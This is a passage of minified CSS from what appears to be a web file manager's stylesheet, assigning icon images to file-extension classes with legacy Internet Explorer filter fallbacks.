\9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt_small.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt_small.png?ver=3.30',sizingMethod='scale');background-size:auto;}.x-php.small{background-image:url("../../../images/file_icon/icon_file/php_small.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/php_small.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/php_small.png?ver=3.30',sizingMethod='scale');background-size:auto;}.x-txt,.x-textile,.x-oexe,.x-inc,.x-csv,.x-log,.x-asc,.x-tsv,.x-lnk,.x-url,.x-webloc,.x-meta,.x-localized,.x-xib,.x-xsd,.x-storyboard,.x-plist,.x-csproj,.x-pch,.x-pbxproj,.x-local,.x-xcscheme,.x-manifest,.x-vbproj,.x-strings,.x-jshintrc,.x-sublime-project,.x-readme,.x-changes,.x-changelog,.x-version,.x-license,.x-changelog,.x-abap,.x-abc,.x-as,.x-asp,.x-aspx,.x-ada,.x-adb,.x-htaccess,.x-htgroups,.x-htgroups,.x-htpasswd,.x-asciidoc,.x-adoc,.x-asm,.x-a,.x-ahk,.x-bat,.x-cmd,.x-cpp,.x-c,.x-cc,.x-cxx,.x-h,.x-hh,.x-hpp,.x-ino,.x-c9search_results,.x-cirru,.x-cr,.x-clj,.x-cljs,.x-cbl,.x-cob,.x-coffee,.x-cf,.x-cson,.x-cakefile,.x-cfm,.x-cs,.x-css,.x-curly,.x-d,.x-di,.x-dart,.x-diff,.x-patch,.x-dockerfile,.x-dot,.x-dummy,.x-dummy,.x-e,.x-ge,.x-ejs,.x-ex,.x-exs,.x-elm,.x-erl,.x-hrl,.x-frt,.x-fs,.x-ldr,.x-ftl,.x-gcode,.x-feature,.x-.gitignore,.x-glsl,.x-frag,.x-vert,.x-gbs,.x-go,.x-groovy,.x-haml,.x-hbs,.x-handlebars,.x-tpl,.x-mustache,.x-hs,.x-hx,.x-html,.x-hta,.x-htm,.x-xhtml,.x-eex,.x-html.eex,.x-erb,.x-rhtml,.x-html.erb,.x-ini,.x-inf,.x-conf,.x-cfg,.x-prefs,.x-io,.x-jack,.x-jade,.x-java,.x-ji,.x-jl,.x-jq,.x-js,.x-jsm,.x-json,.x-jsp,.x-jsx,.x-latex,.x-ltx,.x-bib,.x-lean,.x-hlean,.x-less,.x-liquid,.x-lisp,.x-ls,.x-logic,.x-lql,.x-lsl,.x-lua,.x-lp,.x-lucene,.x-Makefile,.x-makemakefile,.x-gnumakefile,.x-makefile,.x-ocamlmakefile,.x-make,.x-md,.x-markdown,.x-mask,.x-matlab,.x-mz,.x-mel,.x-mc,.x-mush,.x-mysql,.x-nix,.x-nsi,.x-nsh,.x-m,.x-mm,.x-ml,.x-mli,.x-pas,.x-p,.x-pl,.x-pm,.x-pgsql,.x-php,.x-phtml,.x-shtml,.x-php3,.x-php4,.x-php5,.x-phps,.x-phpt,.x-aw,.x-ctp,.x-module,.x-ps1,.x-praat,.x-praatscript,.x-psc,.x-proc,.x-plg,.x-prolog,.x-properties,.x-proto,.x-py,.x-r,.x-cshtml,.x-rd,.x-rhtml,.x-rst,.x-rb,.x-ru,.x-gemspec,.x-rake,.x-guardfile,.x-rakefile,.x-gemfile,.x-rs,.x-sass,.x-scad,.x-scala,.x-scm,.x-sm,.x-rkt,.x-oak,.x-scheme,.x-scss,.x-sh,.x-bash,.x-bashrc,.x-sjs,.x-smarty,.x-tpl,.x-snippets,.x-soy,.x-space,.x-sql,.x-sqlserver,.x-styl,.x-stylus,.x-svg,.x-swift,.x-tcl,.x-tex,.x-toml,.x-twig,.x-swig,.x-ts,.x-typescript,.x-str,.x-vala,.x-vbs,.x-vb,.x-vm,.x-v,.x-vh,.x-sv,.x-svh,.x-vhd,.x-vhdl,.x-wlk,.x-wpgm,.x-wtest,.x-xml,.x-rdf,.x-rss,.x-wsdl,.x-xslt,.x-atom,.x-mathml,.x-mml,.x-xul,.x-xbl,.x-xaml,.x-xq,.x-yaml,.x-yml,.x-cer,.x-reg,.x-config,.x-srt,.x-ass,.x-lrc{background-image:url("../../../images/file_icon/icon_file/txt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt.png?ver=3.30',sizingMethod='scale');}.x-pl,.x-pm,.x-cgi,.x-as,.x-asm,.x-clj,.x-cbl,.x-cfm,.x-d,.x-diff,.x-dot,.x-ejs,.x-erl,.x-ftl,.x-go,.x-hs,.x-vbs,.x-haml,.x-erb,.x-jade,.x-json,.x-jq,.x-jsx,.x-ji,.x-tex,.x-lisp,.x-ls,.x-lsl,.x-lua,.x-lp,.x-matlab,.x-mel,.x-r,.x-yaml,.x-yml{background-image:url("../../../images/file_icon/icon_file/code.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/code.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/code.png?ver=3.30',sizingMethod='scale');}.x-bin,.x-hex,.x-zip,.x-pdf,.x-swf,.x-gzip,.x-rar,.x-arj,.x-tar,.x-gz,.x-cab,.x-tbz,.x-tbz2,.x-lzh,.x-uue,.x-bz2,.x-ace,.x-exe,.x-so,.x-dll,.x-chm,.x-rtf,.x-odp,.x-odt,.x-pages,.x-class,.x-psd,.x-ttf,.x-fla,.x-dmg,.x-dat,.x-ipa,.x-lib,.x-a,.x-apk,.x-so,.x-o{background-image:url("../../../images/file_icon/icon_file/bin.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/bin.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/bin.png?ver=3.30',sizingMethod='scale');}.x-music,.x-mp3,.x-wma,.x-mp2,.x-mid,.x-aac,.x-ogg,.x-oga,.x-webma,.x-wav,.x-m4a,.x-m3u,.x-m4a,.x-midi,.x-mid,.x-flac,.x-alac,.x-ape,.x-ac3{background-image:url("../../../images/file_icon/icon_file/music.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/music.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/music.png?ver=3.30',sizingMethod='scale');}.x-avi,.x-rm,.x-rmvb,.x-mpg,.x-mkv,.x-wmv,.x-mov,.x-mp4,.x-evo,.x-divx,.x-3gp,.x-asf,.x-ogv,.x-webmv,.x-cue,.x-hd,.x-hdmov,.x-mov,.x-mp4v,.x-mpeg,.x-ogm,.x-qt,.x-spx,.x-vob,.x-wmv,.x-xvid,.x-webm,.x-m4v,.x-mts,.x-mpe,.x-m2ts,.x-mpv,.x-cue{background-image:url("../../../images/file_icon/icon_file/movie.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/movie.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/movie.png?ver=3.30',sizingMethod='scale');}.x-flv,.x-f4v{background-image:url("../../../images/file_icon/icon_file/flv.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/flv.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/flv.png?ver=3.30',sizingMethod='scale');}.x-html,.x-htm,.x-url,.x-tpl,.x-lnk,.x-haml,.x-shtml,.x-webloc,.x-hta,.x-xhtml{background-image:url("../../../images/file_icon/icon_file/html.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/html.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/html.png?ver=3.30',sizingMethod='scale');}.x-css,.x-less,.x-sass{background-image:url("../../../images/file_icon/icon_file/css.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/css.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/css.png?ver=3.30',sizingMethod='scale');}.x-js,.x-coffee,.x-jsx{background-image:url("../../../images/file_icon/icon_file/js.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/js.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/js.png?ver=3.30',sizingMethod='scale');}.x-xml,.x-config,.x-manifest,.x-xaml,.x-csproj,.x-vbproj{background-image:url("../../../images/file_icon/icon_file/xml.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xml.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xml.png?ver=3.30',sizingMethod='scale');}.x-cs,.x-asp,.x-aspx{background-image:url("../../../images/file_icon/icon_file/cs.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cs.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cs.png?ver=3.30',sizingMethod='scale');}.x-java,.x-jsp{background-image:url("../../../images/file_icon/icon_file/java.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/java.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/java.png?ver=3.30',sizingMethod='scale');}.x-mm,.x-cc,.x-cxx,.x-cpp,.x-c,.x-m,.x-nc{background-image:url("../../../images/file_icon/icon_file/cpp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cpp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cpp.png?ver=3.30',sizingMethod='scale');}.x-h,.x-hpp,.x-hh,.x-pch{background-image:url("../../../images/file_icon/icon_file/h.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/h.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/h.png?ver=3.30',sizingMethod='scale');}.x-png,.x-jpg,.x-jpeg,.x-bmp,.x-gif,.x-picture,.x-ico,.x-svg,.x-cur,.x-webp,.x-tif,.x-tiff{background-image:url("../../../images/file_icon/icon_file/jpg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jpg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jpg.png?ver=3.30',sizingMethod='scale');}.x-make,.x-Makefile,.x-makefile,.x-GNUmakefile,.x-OCamlMakefile,.x-makemakefile{background-image:url("../../../images/file_icon/icon_file/makefile.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/makefile.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/makefile.png?ver=3.30',sizingMethod='scale');}.x-iso,.x-vcd{background-image:url("../../../images/file_icon/icon_file/iso.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/iso.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/iso.png?ver=3.30',sizingMethod='scale');}.x-pkg,.x-package,.x-framework{background-image:url("../../../images/file_icon/icon_file/pkg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pkg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pkg.png?ver=3.30',sizingMethod='scale');}.x-7z,.x-apk,.x-ace,.x-arj,.x-bza,.x-cab,.x-cxr,.x-dgc,.x-gca,.x-gz,.x-gza,.x-iso,.x-jar,.x-lzh,.x-rar,.x-rk,.x-tar,.x-tbz,.x-tgz,.x-tlz,.x-txz,.x-yz1,.x-zip{background-image:url("../../../images/file_icon/icon_file/zip_all.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/zip_all.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/zip_all.png?ver=3.30',sizingMethod='scale');}.x-exe,.x-bin,.x-class,.x-a,.x-so{background-image:url("../../../images/file_icon/icon_file/exe.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/exe.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/exe.png?ver=3.30',sizingMethod='scale');}.x-ttf,.x-otf,.x-eot,.x-woff,.x-tiff,.x-ttc{background-image:url("../../../images/file_icon/icon_file/font.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/font.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/font.png?ver=3.30',sizingMethod='scale');}.x-bat,.x-cmd,.x-sh,.x-bash,.x-bashrc{background-image:url("../../../images/file_icon/icon_file/cmd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cmd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cmd.png?ver=3.30',sizingMethod='scale');}.x-ini,.x-inf,.x-conf,.x-meta,.x-gitignore,.x-plist,.x-htaccess,.x-localized,.x-xcscheme,.x-storyboard,.x-xib,.x-strings,.x-pbxproj{background-image:url("../../../images/file_icon/icon_file/ini.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ini.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ini.png?ver=3.30',sizingMethod='scale');}.x-md,.x-markdown{background-image:url("../../../images/file_icon/icon_file/md.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/md.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/md.png?ver=3.30',sizingMethod='scale');}.x-file{background-image:url("../../../images/file_icon/icon_file/file.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');}.x-accdb{background-image:url("../../../images/file_icon/icon_file/accdb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/accdb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/accdb.png?ver=3.30',sizingMethod='scale');}.x-7z{background-image:url("../../../images/file_icon/icon_file/7z.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/7z.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/7z.png?ver=3.30',sizingMethod='scale');}.x-ai{background-image:url("../../../images/file_icon/icon_file/ai.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ai.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ai.png?ver=3.30',sizingMethod='scale');}.x-air{background-image:url("../../../images/file_icon/icon_file/air.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/air.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/air.png?ver=3.30',sizingMethod='scale');}.x-arj{background-image:url("../../../images/file_icon/icon_file/arj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/arj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/arj.png?ver=3.30',sizingMethod='scale');}.x-apk{background-image:url("../../../images/file_icon/icon_file/apk.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/apk.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/apk.png?ver=3.30',sizingMethod='scale');}.x-as{background-image:url("../../../images/file_icon/icon_file/as.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/as.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/as.png?ver=3.30',sizingMethod='scale');}.x-ascx{background-image:url("../../../images/file_icon/icon_file/ascx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ascx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ascx.png?ver=3.30',sizingMethod='scale');}.x-ashx{background-image:url("../../../images/file_icon/icon_file/ashx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ashx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ashx.png?ver=3.30',sizingMethod='scale');}.x-asmx{background-image:url("../../../images/file_icon/icon_file/asmx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/asmx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/asmx.png?ver=3.30',sizingMethod='scale');}.x-aspx{background-image:url("../../../images/file_icon/icon_file/aspx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/aspx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/aspx.png?ver=3.30',sizingMethod='scale');}.x-bz2{background-image:url("../../../images/file_icon/icon_file/bz2.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/bz2.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/bz2.png?ver=3.30',sizingMethod='scale');}.x-cdr{background-image:url("../../../images/file_icon/icon_file/cdr.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cdr.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cdr.png?ver=3.30',sizingMethod='scale');}.x-cer{background-image:url("../../../images/file_icon/icon_file/cer.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cer.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cer.png?ver=3.30',sizingMethod='scale');}.x-chm{background-image:url("../../../images/file_icon/icon_file/chm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/chm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/chm.png?ver=3.30',sizingMethod='scale');}.x-cmd{background-image:url("../../../images/file_icon/icon_file/cmd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cmd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cmd.png?ver=3.30',sizingMethod='scale');}.x-c{background-image:url("../../../images/file_icon/icon_file/c.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/c.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/c.png?ver=3.30',sizingMethod='scale');}.x-cpp{background-image:url("../../../images/file_icon/icon_file/cpp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cpp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cpp.png?ver=3.30',sizingMethod='scale');}.x-cs{background-image:url("../../../images/file_icon/icon_file/cs.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cs.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cs.png?ver=3.30',sizingMethod='scale');}.x-cshtml{background-image:url("../../../images/file_icon/icon_file/cshtml.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cshtml.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cshtml.png?ver=3.30',sizingMethod='scale');}.x-csproj{background-image:url("../../../images/file_icon/icon_file/csproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/csproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/csproj.png?ver=3.30',sizingMethod='scale');}.x-css{background-image:url("../../../images/file_icon/icon_file/css.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/css.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/css.png?ver=3.30',sizingMethod='scale');}.x-csv{background-image:url("../../../images/file_icon/icon_file/csv.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/csv.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/csv.png?ver=3.30',sizingMethod='scale');}.x-djvu{background-image:url("../../../images/file_icon/icon_file/djvu.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/djvu.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/djvu.png?ver=3.30',sizingMethod='scale');}.x-dll{background-image:url("../../../images/file_icon/icon_file/dll.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dll.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dll.png?ver=3.30',sizingMethod='scale');}.x-dng{background-image:url("../../../images/file_icon/icon_file/dng.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dng.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dng.png?ver=3.30',sizingMethod='scale');}.x-dmg,.x-img{background-image:url("../../../images/file_icon/icon_file/dmg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dmg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dmg.png?ver=3.30',sizingMethod='scale');}.x-doc,.x-wps{background-image:url("../../../images/file_icon/icon_file/doc.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/doc.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/doc.png?ver=3.30',sizingMethod='scale');}.x-docm{background-image:url("../../../images/file_icon/icon_file/docm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/docm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/docm.png?ver=3.30',sizingMethod='scale');}.x-docx{background-image:url("../../../images/file_icon/icon_file/docx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/docx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/docx.png?ver=3.30',sizingMethod='scale');}.x-dot{background-image:url("../../../images/file_icon/icon_file/dot.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dot.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dot.png?ver=3.30',sizingMethod='scale');}.x-dotm{background-image:url("../../../images/file_icon/icon_file/dotm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dotm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dotm.png?ver=3.30',sizingMethod='scale');}.x-dotx{background-image:url("../../../images/file_icon/icon_file/dotx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dotx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dotx.png?ver=3.30',sizingMethod='scale');}.x-dtd{background-image:url("../../../images/file_icon/icon_file/dtd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dtd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dtd.png?ver=3.30',sizingMethod='scale');}.x-eps{background-image:url("../../../images/file_icon/icon_file/eps.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/eps.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/eps.png?ver=3.30',sizingMethod='scale');}.x-epub{background-image:url("../../../images/file_icon/icon_file/epub.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/epub.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/epub.png?ver=3.30',sizingMethod='scale');}.x-exe{background-image:url("../../../images/file_icon/icon_file/exe.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/exe.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/exe.png?ver=3.30',sizingMethod='scale');}.x-f{background-image:url("../../../images/file_icon/icon_file/f.png");background-image:none 